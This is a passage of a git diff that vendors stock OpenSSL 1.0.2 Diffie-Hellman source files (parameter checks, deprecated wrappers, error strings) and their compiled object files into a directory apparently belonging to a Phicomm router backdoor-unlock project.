+    if (!dhx) {
+        DH_free(dh);
+        return NULL;
+    }
+
+    if (a) {
+        if (*a)
+            DH_free(*a);
+        *a = dh;
+    }
+
+    dh->p = dhx->p;
+    dh->q = dhx->q;
+    dh->g = dhx->g;
+    dh->j = dhx->j;
+
+    if (dhx->vparams) {
+        dh->seed = dhx->vparams->seed->data;
+        dh->seedlen = dhx->vparams->seed->length;
+        dh->counter = dhx->vparams->counter;
+        dhx->vparams->seed->data = NULL;
+        ASN1_BIT_STRING_free(dhx->vparams->seed);
+        OPENSSL_free(dhx->vparams);
+        dhx->vparams = NULL;
+    }
+
+    OPENSSL_free(dhx);
+    return dh;
+}
+
+int i2d_DHxparams(const DH *dh, unsigned char **pp)
+{
+    int_dhx942_dh dhx;
+    int_dhvparams dhv;
+    ASN1_BIT_STRING bs;
+    dhx.p = dh->p;
+    dhx.g = dh->g;
+    dhx.q = dh->q;
+    dhx.j = dh->j;
+    if (dh->counter && dh->seed && dh->seedlen > 0) {
+        bs.flags = ASN1_STRING_FLAG_BITS_LEFT;
+        bs.data = dh->seed;
+        bs.length = dh->seedlen;
+        dhv.seed = &bs;
+        dhv.counter = dh->counter;
+        dhx.vparams = &dhv;
+    } else
+        dhx.vparams = NULL;
+
+    return i2d_int_dhx(&dhx, pp);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_asn1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_asn1.o
new file mode 100644
index 0000000000000000000000000000000000000000..53c30278f059b32bb40e44f06611e91f772df424
GIT binary patch
literal 5520
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
Ze769D`0Iz5_4*h1;D1y1s=fUE{{T&Zc{u<8

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_check.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_check.c
new file mode 100644
index 0000000..347467c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_check.c
@@ -0,0 +1,173 @@
+/* crypto/dh/dh_check.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/dh.h>
+
+/*-
+ * Check that p is a safe prime and
+ * if g is 2, 3 or 5, check that it is a suitable generator
+ * where
+ * for 2, p mod 24 == 11
+ * for 3, p mod 12 == 5
+ * for 5, p mod 10 == 3 or 7
+ * should hold.
+ */
+
+int DH_check(const DH *dh, int *ret)
+{
+    int ok = 0;
+    BN_CTX *ctx = NULL;
+    BN_ULONG l;
+    BIGNUM *t1 = NULL, *t2 = NULL;
+
+    *ret = 0;
+    ctx = BN_CTX_new();
+    if (ctx == NULL)
+        goto err;
+    BN_CTX_start(ctx);
+    t1 = BN_CTX_get(ctx);
+    if (t1 == NULL)
+        goto err;
+    t2 = BN_CTX_get(ctx);
+    if (t2 == NULL)
+        goto err;
+
+    if (dh->q) {
+        if (BN_cmp(dh->g, BN_value_one()) <= 0)
+            *ret |= DH_NOT_SUITABLE_GENERATOR;
+        else if (BN_cmp(dh->g, dh->p) >= 0)
+            *ret |= DH_NOT_SUITABLE_GENERATOR;
+        else {
+            /* Check g^q == 1 mod p */
+            if (!BN_mod_exp(t1, dh->g, dh->q, dh->p, ctx))
+                goto err;
+            if (!BN_is_one(t1))
+                *ret |= DH_NOT_SUITABLE_GENERATOR;
+        }
+        if (!BN_is_prime_ex(dh->q, BN_prime_checks, ctx, NULL))
+            *ret |= DH_CHECK_Q_NOT_PRIME;
+        /* Check p == 1 mod q  i.e. q divides p - 1 */
+        if (!BN_div(t1, t2, dh->p, dh->q, ctx))
+            goto err;
+        if (!BN_is_one(t2))
+            *ret |= DH_CHECK_INVALID_Q_VALUE;
+        if (dh->j && BN_cmp(dh->j, t1))
+            *ret |= DH_CHECK_INVALID_J_VALUE;
+
+    } else if (BN_is_word(dh->g, DH_GENERATOR_2)) {
+        l = BN_mod_word(dh->p, 24);
+        if (l != 11)
+            *ret |= DH_NOT_SUITABLE_GENERATOR;
+    }
+#if 0
+    else if (BN_is_word(dh->g, DH_GENERATOR_3)) {
+        l = BN_mod_word(dh->p, 12);
+        if (l != 5)
+            *ret |= DH_NOT_SUITABLE_GENERATOR;
+    }
+#endif
+    else if (BN_is_word(dh->g, DH_GENERATOR_5)) {
+        l = BN_mod_word(dh->p, 10);
+        if ((l != 3) && (l != 7))
+            *ret |= DH_NOT_SUITABLE_GENERATOR;
+    } else
+        *ret |= DH_UNABLE_TO_CHECK_GENERATOR;
+
+    if (!BN_is_prime_ex(dh->p, BN_prime_checks, ctx, NULL))
+        *ret |= DH_CHECK_P_NOT_PRIME;
+    else if (!dh->q) {
+        if (!BN_rshift1(t1, dh->p))
+            goto err;
+        if (!BN_is_prime_ex(t1, BN_prime_checks, ctx, NULL))
+            *ret |= DH_CHECK_P_NOT_SAFE_PRIME;
+    }
+    ok = 1;
+ err:
+    if (ctx != NULL) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    return (ok);
+}
+
+int DH_check_pub_key(const DH *dh, const BIGNUM *pub_key, int *ret)
+{
+    int ok = 0;
+    BIGNUM *q = NULL;
+
+    *ret = 0;
+    q = BN_new();
+    if (q == NULL)
+        goto err;
+    BN_set_word(q, 1);
+    if (BN_cmp(pub_key, q) <= 0)
+        *ret |= DH_CHECK_PUBKEY_TOO_SMALL;
+    BN_copy(q, dh->p);
+    BN_sub_word(q, 1);
+    if (BN_cmp(pub_key, q) >= 0)
+        *ret |= DH_CHECK_PUBKEY_TOO_LARGE;
+
+    ok = 1;
+ err:
+    if (q != NULL)
+        BN_free(q);
+    return (ok);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_check.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_check.o
new file mode 100644
index 0000000000000000000000000000000000000000..32c3e46b50e4796fd391108105cd101816192073
GIT binary patch
literal 3456
zcmbuBO>7%Q6oAKe(ioDiw*jh@qF@QBgrBV9^3&1-@;Y&{1~-K^E)i*1+0M3(6935F
zZJmmwhm9*%Zc7gw5T{<a!>yM_7NL!LL#mJvQl$zB5frthDxj)Rh4;oY$z<!55Iku-
zGvE7}w{Lc5d?ub8_WOK<i;uibHfNj?5`9t_(_xfsCtc)zsQ00IR87Srx7D$f<~%y0
zIrmq#p~WixXthRYu>lbi&bOMgLRr%Jh4u;ODpg+q^(MPU*=b;!Js%~Z#p@ff>hrSZ
zT%*3V#)78Rt)K>sfw_HJ{UCr;^q_Mq>D&c1SA`Z|hIpzyAM{x}67@KQ-tV(I0La7)
z*qs<A8o3_%GwJ-qqFI1t2pENcK^hR0cbPJ@_#-5x+6xd*PSm&Ya0|_FVF;&bwRLkk
z>D*y1=A_*jT^rZxaoMhd+q+sF!q3CX-J1Q-Z|$_JGO^xR>e+Z&`$6YgFX-B>=c#Vj
z67B&Fr`fmu((DHTGYGk_L8fgO%Jl&4cBgNxpBB;DgSFbs-|S_!n+TuRuU>&Nk+lHq
zCf^X=PYgM$lj<>bQvGO|Zh9)=JW|IJ&hIJM@*D53_`#E9=Uk06wAyX+gCz{7v9f8-
z9UiRKI0MW161ag(>up-a%(&TQjQHUM&19L33=SR$_oXsc!L-6}DX%F5{gHhZokkY+
z4k!b!ztqH}4cugC?a)R>Qv|YYAPYc4dAivV-|54|SCxIcyE=jwVXghZpJTc|aP479
zzTl5ZJ?8^)DSWO?mHN)M4@m>|w!jZQsc%RMgDxh?F)2uW$C>XZ*n{tRe_ZN07XZ7n
z=xd{|KQHyEQdr$^WInArOree3TW_TcwES}M8TnIg^$O6cY-KnL5c>T-rU;OZ$5_)o
z=)tktTcr!8-9nzUrof(ohWq1|R{*r)Z+h@S4?gO_Cp>t@gXcZ?#~$4F;GcT%FFg2{
z9{g+ISWjL@`kn#%#={;D(^mET-h<!t;J<osGL_S_IU_rxWXX`$91?vbc_^kP^+UtM
zN8)4pm>NsQbrKuZ2gk<sf^muuD`vWE^2rH<4o{|MEkiFB4CL8-3A=o8N;j%>I9<_8
z<>|ZubJR>tpX3IoisdOBmn*sH<7NbhxSUa-6o<#lhOv>PUa~U!j4_9HETxKJ>O4xe
zSfZ*5SaC-Ep$;hgjKDLc6WZVFO&LHX2y%S)ImdGa1^ISpoF@^2xOuLLDVJc(?M;D)
z1YYytmjsUQ0grP-;5!8Vo4~sT{sJCEAeg7P?ook11v(zT?7=@1xVY|D0>`tN$5|G*
zXn#}Sc$RScp9Q{C;4;0gn)&0E%k5tj_%4C(6}b4kae+T8*dG@7Zh=n<T#Pd-aD10|
zK4BQ6pqiP``7!#t$@%wBl*(M*OlP1s%gsK=M`dF+t(ZpDB+69UOcNzjsSqVw%;${)
zutL!^6u2Av;WNz6u=$CCrIgCWl2JD2h(aS6IrwtYd4px}|GF@^;}*GZoG37qdGVoP
z&bE{4@CR#)?_d;~C>pz}#+g6<bwXc$Q{kSY?16^deM4Sxt&6rO?)6^<hB5!Ee}u*4
z=LAft@b&Tj6NRtO`vailW6^H)U*`V~IAN*W=G;Fl28A)NAIBLO;QDU=AS=j4ZpeDK
z|0M8M`*-PyrUS1F?jQPcf4+aM)<)0I+4`4RVt6KFNVh*S_uc^_@39y19!>;t*BZ~D
QR{r0y{AUGU9J>Ag0si}A(EtDd

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_depr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_depr.c
new file mode 100644
index 0000000..b622119
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_depr.c
@@ -0,0 +1,82 @@
+/* crypto/dh/dh_depr.c */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/* This file contains deprecated functions as wrappers to the new ones */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/dh.h>
+
+static void *dummy = &dummy;
+
+#ifndef OPENSSL_NO_DEPRECATED
+DH *DH_generate_parameters(int prime_len, int generator,
+                           void (*callback) (int, int, void *), void *cb_arg)
+{
+    BN_GENCB cb;
+    DH *ret = NULL;
+
+    if ((ret = DH_new()) == NULL)
+        return NULL;
+
+    BN_GENCB_set_old(&cb, callback, cb_arg);
+
+    if (DH_generate_parameters_ex(ret, prime_len, generator, &cb))
+        return ret;
+    DH_free(ret);
+    return NULL;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_depr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_depr.o
new file mode 100644
index 0000000000000000000000000000000000000000..196d778e98c540bccdcbcbeea3bbb051b0bbdb40
GIT binary patch
literal 1912
zcmbu9TWb?R6vro*UbO8R#fLye7KswkE{PSaMKqh{vXx+qZA7tk-6YdS+N5E#!PW<T
zC>54k@uT<=0v76vzWCy!f}n^9QUnpDp0hh+Cfnpi4-Ds=-_C!|T=!8rm+||2gqx3C
zCasK9LdJrvIN^i|GDHT+?xEv9)f<!cYc;Rh-__Z?{d-2U-)QS!<dU`-JQ;<)nw^S-
z<IPVfo3yvJjiwdT?Dr}Av;9@GcXomiteCT{NWW&!MM6%;jb>vYXMaq`KRBtj31gJB
zQFlbE$A#<La?XBtdtRMW=hZteNOodkT#n`ojjGj<FDj!-Y$Sf6;iU10=VD6i{Am{x
zTuumD547yHJn<9KL>7RCcGPvm_uxA5t%iKVgMIzaV49bJA7kIP&}XF3Q-4|tZw1nl
z{3NJK(Z@X#Qf$39D^2?sq*zLds*;?P!bvHVl=_);pTivpl5czaJ^%=GJQ3u4w(Y8b
zv$}SMS%CEJhYs)S!aGkl;OttvWB}45!aSY50d@i!?z7j%0CeJ4y6{_FxY31^Qduw2
znyC~?O4Ao<m70b{^_pQC6>3qlPV{VUDyio5sZ3@jJ*&^E$y{2;&Q*H9i$<rb_+`PQ
zl<0chGKx!jvAm=&826T89%yG>=bQlU$*(=v@&X?ecuC+x0$&rjBygE=xUYC;Tc*_4
zDwa_oO5HMDU*?fXmkq_Ds}@m8hGh_?P_GlExKgRmDzNH`MHP4hBhG?YzF2K2HFKp#
zO>2!P&Iq&&D~H`{)%=f01})xs?~P0VL*w_y&D_2`Mn4P<-)jPzXw&RT+-2|}c&x*3
za+vW`jC)_uEB4*%a17D#oN>&5)yF}LW5%F~#_OLEA;i2s_u~Q+yZ#UpA?7-cu0nvX
zzU>Y{&h;|HqVfIXtN;Oy>D7l>p_{xT^IrWt@J{FVoNXvSCp<sYay{prYGbJyt6ydw
l-{64`dSu?S14Q1k1(}!##)kV#4nx#Q|B^xeKi~qd{tv(8%y|F+

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_err.c
new file mode 100644
index 0000000..b890cca
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_err.c
@@ -0,0 +1,126 @@
+/* crypto/dh/dh_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2013 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/dh.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_DH,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_DH,0,reason)
+
+static ERR_STRING_DATA DH_str_functs[] = {
+    {ERR_FUNC(DH_F_COMPUTE_KEY), "COMPUTE_KEY"},
+    {ERR_FUNC(DH_F_DHPARAMS_PRINT_FP), "DHparams_print_fp"},
+    {ERR_FUNC(DH_F_DH_BUILTIN_GENPARAMS), "DH_BUILTIN_GENPARAMS"},
+    {ERR_FUNC(DH_F_DH_CMS_DECRYPT), "DH_CMS_DECRYPT"},
+    {ERR_FUNC(DH_F_DH_CMS_SET_PEERKEY), "DH_CMS_SET_PEERKEY"},
+    {ERR_FUNC(DH_F_DH_CMS_SET_SHARED_INFO), "DH_CMS_SET_SHARED_INFO"},
+    {ERR_FUNC(DH_F_DH_COMPUTE_KEY), "DH_compute_key"},
+    {ERR_FUNC(DH_F_DH_GENERATE_KEY), "DH_generate_key"},
+    {ERR_FUNC(DH_F_DH_GENERATE_PARAMETERS_EX), "DH_generate_parameters_ex"},
+    {ERR_FUNC(DH_F_DH_NEW_METHOD), "DH_new_method"},
+    {ERR_FUNC(DH_F_DH_PARAM_DECODE), "DH_PARAM_DECODE"},
+    {ERR_FUNC(DH_F_DH_PRIV_DECODE), "DH_PRIV_DECODE"},
+    {ERR_FUNC(DH_F_DH_PRIV_ENCODE), "DH_PRIV_ENCODE"},
+    {ERR_FUNC(DH_F_DH_PUB_DECODE), "DH_PUB_DECODE"},
+    {ERR_FUNC(DH_F_DH_PUB_ENCODE), "DH_PUB_ENCODE"},
+    {ERR_FUNC(DH_F_DO_DH_PRINT), "DO_DH_PRINT"},
+    {ERR_FUNC(DH_F_GENERATE_KEY), "GENERATE_KEY"},
+    {ERR_FUNC(DH_F_GENERATE_PARAMETERS), "GENERATE_PARAMETERS"},
+    {ERR_FUNC(DH_F_PKEY_DH_DERIVE), "PKEY_DH_DERIVE"},
+    {ERR_FUNC(DH_F_PKEY_DH_KEYGEN), "PKEY_DH_KEYGEN"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA DH_str_reasons[] = {
+    {ERR_REASON(DH_R_BAD_GENERATOR), "bad generator"},
+    {ERR_REASON(DH_R_BN_DECODE_ERROR), "bn decode error"},
+    {ERR_REASON(DH_R_BN_ERROR), "bn error"},
+    {ERR_REASON(DH_R_DECODE_ERROR), "decode error"},
+    {ERR_REASON(DH_R_INVALID_PUBKEY), "invalid public key"},
+    {ERR_REASON(DH_R_KDF_PARAMETER_ERROR), "kdf parameter error"},
+    {ERR_REASON(DH_R_KEYS_NOT_SET), "keys not set"},
+    {ERR_REASON(DH_R_KEY_SIZE_TOO_SMALL), "key size too small"},
+    {ERR_REASON(DH_R_MODULUS_TOO_LARGE), "modulus too large"},
+    {ERR_REASON(DH_R_NON_FIPS_METHOD), "non fips method"},
+    {ERR_REASON(DH_R_NO_PARAMETERS_SET), "no parameters set"},
+    {ERR_REASON(DH_R_NO_PRIVATE_VALUE), "no private value"},
+    {ERR_REASON(DH_R_PARAMETER_ENCODING_ERROR), "parameter encoding error"},
+    {ERR_REASON(DH_R_PEER_KEY_ERROR), "peer key error"},
+    {ERR_REASON(DH_R_SHARED_INFO_ERROR), "shared info error"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_DH_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(DH_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, DH_str_functs);
+        ERR_load_strings(0, DH_str_reasons);
+    }
+#endif
+}
